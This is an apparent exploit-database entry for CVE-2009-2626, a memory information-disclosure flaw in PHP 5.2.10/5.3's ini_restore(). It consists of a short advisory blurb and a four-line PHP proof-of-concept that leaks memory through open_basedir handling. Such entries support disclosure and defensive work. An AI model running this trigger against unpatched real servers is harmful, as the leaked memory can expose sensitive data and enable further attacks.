PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (2)
| EKU-ID: 38028 | CVE: CVE-2009-2626;OSVDB-60654 | OSVDB-ID: |
| Author: Maksymilian Arciemowicz | Published: 2009-08-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 38028 | CVE: CVE-2009-2626;OSVDB-60654 | OSVDB-ID: |
| Author: Maksymilian Arciemowicz | Published: 2009-08-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");
include("B");
?>